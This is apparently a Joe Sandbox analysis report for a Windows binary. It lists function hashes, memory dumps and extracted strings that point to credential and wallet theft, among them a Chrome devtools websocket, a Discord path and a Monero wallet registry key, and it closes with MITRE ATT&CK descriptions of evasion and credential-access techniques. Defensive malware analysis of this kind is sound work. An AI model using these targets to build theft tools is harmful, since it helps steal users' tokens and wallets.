Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e74bcdd5bd5b18fb6768735515312101a726b6f0c00fc3420d4a14ed1f6ca57
Instruction ID: 0c1dd603efebc452ff4f50f06d4f4f5218a8c44432edd8fd7768fbf10751d285
Opcode Fuzzy Hash: 1e74bcdd5bd5b18fb6768735515312101a726b6f0c00fc3420d4a14ed1f6ca57
Instruction Fuzzy Hash: 6C21564800D2E088C713833540A55A2BFE25DAF00E76ED1CED4DC0E3A7D29BC59BDB22

Function 00431111 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9126307184193b7d728a0c62c5bcb6e1138b762b7913830f3c83dbf8ac33c24a
Instruction ID: 6ef362762f3c646688cee0ed093de866cf938d106eecbbec238328a2fa3198fd
Opcode Fuzzy Hash: 9126307184193b7d728a0c62c5bcb6e1138b762b7913830f3c83dbf8ac33c24a
Instruction Fuzzy Hash: D211335800D2E099C717873540E44A6BFE24DAF10E76ED1CDE4D80E3A7C15BC55BDB26

Function 004301D1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66759dfc28a6fac7ab792b86d0b9bc36e241f89ad918cdd3e7ea13b0b5dce8df
Instruction ID: 249635abf5f681440c1b15dc9d4ac5da904b76325560df026c838288709a1eef
Opcode Fuzzy Hash: 66759dfc28a6fac7ab792b86d0b9bc36e241f89ad918cdd3e7ea13b0b5dce8df
Instruction Fuzzy Hash: F011334800D2E059CB17873540A45A2BFE25DAF10E76ED1CDD4D80E3A7C16BC55FDB22

Function 0041B2A1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e55cd5ebea7d4adfdf579e102a1aad8a2411b51367bc6060387186117b1111d
Instruction ID: 933031ca5d12bb4ec155fb361d2ebb5f71ebfdd1f62be795dd520c3404e1fb78
Opcode Fuzzy Hash: 1e55cd5ebea7d4adfdf579e102a1aad8a2411b51367bc6060387186117b1111d
Instruction Fuzzy Hash: 6B11334800D2E059CB17873541E44A2BFE25DAF10D76ED1CED4D80E3A7C1ABD59BDB22

Function 004043E1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c941652612581987419a85fa7e13b7aec26e2d45026f8e77bd503e8c1e894725
Instruction ID: 7007ce7ace1fd8a12f0e220d7590b40c7821056d717ca008a8f197f52b2affc9
Opcode Fuzzy Hash: c941652612581987419a85fa7e13b7aec26e2d45026f8e77bd503e8c1e894725
Instruction Fuzzy Hash: B611454800D2E059CB17873541E44A2BFE25DAF10D76ED1CEE4D80E3A7D1ABC55BDB22

Function 0042F491 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee962a252bd08b5e125c5525b01bc00f3e7a1ff336b409ed0015f6ace968ffc
Instruction ID: 92ac429581198c97d6b28284ed8d0e8ac85665259e75bb52c0fde49d26fb1d98
Opcode Fuzzy Hash: eee962a252bd08b5e125c5525b01bc00f3e7a1ff336b409ed0015f6ace968ffc
Instruction Fuzzy Hash: 9511E05810D2E059CB1B8B3540A45A2BFE25DAF10A77ED0DDD4D80E3A7C05BC54BD736

Function 0041B521 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b451672b94d52fc355e3b6a766dc3613914aca278e000f9b94938b6384a4d57
Instruction ID: 7efbb71a2ef304345ae85561c36da1ed3611e0b69fe23547e9c05feeefc86a0f
Opcode Fuzzy Hash: 3b451672b94d52fc355e3b6a766dc3613914aca278e000f9b94938b6384a4d57
Instruction Fuzzy Hash: 7A11335800D2E059C717873541E45A2BFE24DAF10D76ED1CDE4D80E3A7C19BC55BDB26

Function 004207B1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6976f6aab50cb0850511527ee6e8cf75f1507a6cf3e6ba92dac0b62b58617f3
Instruction ID: 20ceea9112589fcf3e1800424e3d24c7178de40dce2ad69421e6c9ab296b6c5a
Opcode Fuzzy Hash: e6976f6aab50cb0850511527ee6e8cf75f1507a6cf3e6ba92dac0b62b58617f3
Instruction Fuzzy Hash: 2D11335800D2E059CB17873541A48A2BFE25DAF10D76ED1CED4D80E3A7C1ABC55FDB22

Function 0042F8F1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd331329f8bb2bceb831a28fc2df1c27ad8248ea6b45105ee1982ca8d8b8535
Instruction ID: 2dfb15c3d7a34687f796f57f95a244542b67be810d33be7b0db8d0fb68874d73
Opcode Fuzzy Hash: bbd331329f8bb2bceb831a28fc2df1c27ad8248ea6b45105ee1982ca8d8b8535
Instruction Fuzzy Hash: E011104810D2E059CB1B8B3540A44A2BFE25DAF10976ED0CDD4D80E3A7C057C58BD736

Function 004199F1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b460f3035f83cbbba9d533276238d91ef7ad1281ea9d31f2badcc1821dc3679
Instruction ID: b691467f5e7c21d622a0f36d937084cc18f39bb1aa3a6c626c5826aec042b973
Opcode Fuzzy Hash: 0b460f3035f83cbbba9d533276238d91ef7ad1281ea9d31f2badcc1821dc3679
Instruction Fuzzy Hash: B911224810D2E059CB17873540A45A2BFE25DAF10D76ED1CEE4D80E3A7C1ABC59BDB36

Function 0042DC41 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78cb072e77b3f78788deef64ea31a313593665239a48f9541a136f2ffd3fab69
Instruction ID: a9769ade8956982e59be8444820f90d7a99b401266dd92afcf0ec356509268ad
Opcode Fuzzy Hash: 78cb072e77b3f78788deef64ea31a313593665239a48f9541a136f2ffd3fab69
Instruction Fuzzy Hash: E611228810D2E059CB17873540A44A6BFE25DAF10E76ED1CDD4D80E3A7C1ABC59BDB26

Function 00430F61 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e774b6c3b19ff005b8515e2b82cd2da44a68ff9a6c4d8c158293a28db6317d8
Instruction ID: 57f5f67bcb62ebbceebe227056516bfb7aa9f9b5a0089528422f2e3d8eacad2e
Opcode Fuzzy Hash: 5e774b6c3b19ff005b8515e2b82cd2da44a68ff9a6c4d8c158293a28db6317d8
Instruction Fuzzy Hash: 4911454800D2E059CB17873540E58A2BFE25DAF10E76ED1CDE4D80E7A7C1ABC55BDB22

Function 0040B4E1 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B55D

Strings

/devtools, xrefs: 0040B51E, 0040B524, 0040B537
ws://localhost:9223, xrefs: 0040B577, 0040B57D, 0040B58A
localhost, xrefs: 0040B4F3, 0040B4F9, 0040B509

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: /devtools$localhost$ws://localhost:9223
API String ID: 2221118986-2676143373
Opcode ID: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
Instruction ID: 94e44766b1f48ed0313359b6b2832c1626453bbd1d254d7316a7bd8e4186ea0b
Opcode Fuzzy Hash: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
Instruction Fuzzy Hash: 1D31EAB67801109FD704DBA8DCC1E6E37BCEBC6714B0C4129E906D3352DA789A65CB59

Function 0042993F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042995B
memset.MSVCRT ref: 0042996C

Strings

\discord\, xrefs: 004299C8, 004299CE, 004299DB
C$n, xrefs: 004299F7

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: C$n$\discord\
API String ID: 2221118986-695827262
Opcode ID: c345ef2812bc68e658e74a74bf69f4bc64b0e86f0f512324dfc0ea04a0b5d0b2
Instruction ID: 2ed6e5277a763543ee5a6e9ab04d990fc49394e88863e3d643c10f1d4990ae40
Opcode Fuzzy Hash: c345ef2812bc68e658e74a74bf69f4bc64b0e86f0f512324dfc0ea04a0b5d0b2
Instruction Fuzzy Hash: F6317176A002149BD210EB9DDC85E9B77EAAFD6314F080034E805D7352D7749E19C7E9

Function 004284DB Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00428599

Strings

%s\%s\%s, xrefs: 004284F5, 004284FB, 00428537, 0042853C
<E, xrefs: 004285C7
Files, xrefs: 00428513, 00428519, 00428533

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: %s\%s\%s$Files$<E
API String ID: 2221118986-4166326729
Opcode ID: 7f4d2d494edd50ffecfecc01823f6e7a19626eb51f66771e39c5d06c7254cddb
Instruction ID: 0717042b4f25f8a29bf6635a1133c4f2e9fe49c06dca74608bab38cd810ebc2b
Opcode Fuzzy Hash: 7f4d2d494edd50ffecfecc01823f6e7a19626eb51f66771e39c5d06c7254cddb
Instruction Fuzzy Hash: 832126B7A00215ABD704CF58DC82D9633A9FB95305B094039E506A7702F678BF5A8BE8

Function 004011B9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004011D3

Strings

qqt, xrefs: 00401259
SOFTWARE\monero-project\monero-core, xrefs: 004011F2, 004011F8, 00401224, 00401229
wallet_path, xrefs: 00401210, 00401216, 00401223

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: SOFTWARE\monero-project\monero-core$qqt$wallet_path
API String ID: 2221118986-2179174401
Opcode ID: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
Instruction ID: 7a2c87307ec0540e7d715f3f6b37445b2dbc1dc42b57d5ae72fd3d8d753b74c4
Opcode Fuzzy Hash: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
Instruction Fuzzy Hash: 4901C4757101006BD308E758EC8AE3F37AEE7C6755F48402EF805E7742EAE8A919876D

Function 00428787 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004288DA

Strings

C:\ProgramData\, xrefs: 004287B1, 004287B7, 004287C9
<E, xrefs: 004287F3

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: C:\ProgramData\$<E
API String ID: 885266447-1062732236
Opcode ID: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
Instruction ID: 1e570ea21499aea3d5f253e6478c06357d2086eee86d9d4146b419b7b24b62a2
Opcode Fuzzy Hash: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
Instruction Fuzzy Hash: E3411F7AB006149FDB14DBACEC91E9D73F6EFC9304B080138E416E7351DA68AE19CB58

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
